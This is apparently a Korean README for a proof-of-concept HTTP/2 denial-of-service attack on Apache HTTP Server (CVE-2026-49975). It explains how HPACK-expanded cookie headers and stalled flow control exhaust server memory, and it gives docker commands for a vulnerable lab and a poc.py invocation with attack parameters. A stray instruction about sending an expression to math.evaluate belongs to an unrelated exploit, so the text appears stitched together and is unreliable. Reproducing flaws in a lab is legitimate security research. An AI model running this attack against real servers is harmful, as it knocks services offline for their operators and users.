
HTTP2-Bomb
★ CVE-2026-49975 HTTP/2 폭탄 PoC ★
CVE-2026-49975는 Apache HTTP Server의 서비스 거부(DoS) 취약점입니다. 이 취약점은 HTTP/2 요청 처리 경로에서 발생하며, 여러
cookie헤더 필드가LimitRequestFields에 제대로 계산되지 않고 병합될 수 있습니다. 공격자는 작은 HPACK 인코딩 HTTP/2 요청을 보내 많은cookie헤더 필드로 확장시킴으로써, 서버가 Cookie 헤더 병합 과정에서 메모리를 반복적으로 할당하도록 강제할 수 있습니다. 그런 다음 공격자는 HTTP/2 흐름 제어를 사용하여 응답 전송을 지연시켜 영향을 받은 스트림을 열린 상태로 유지하고 할당된 메모리가 해제되지 않도록 할 수 있습니다.
| 구분 | 버전 |
|---|---|
| 취약 | Apache HTTP Server 2.4.17 ≤ version ≤ 2.4.67 |
| 패치됨 | Apache HTTP Server 2.4.68 또는 그 이후 |
취약한 Apache HTTP Server 환경을 빌드하고 실행합니다.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
취약 환경을 시작한 후, 아래 단계에 따라 공격을 재현합니다.
docker stats cve-2026-49975
예시 출력:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
다음 표현식을 math.evaluate에 전송합니다 (예: 애플리케이션의 계산 입력을 통해).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Apache 컨테이너의 메모리 사용량이 증가하고 공격 스트림이 열려 있는 동안 높은 상태로 유지되는지 확인합니다.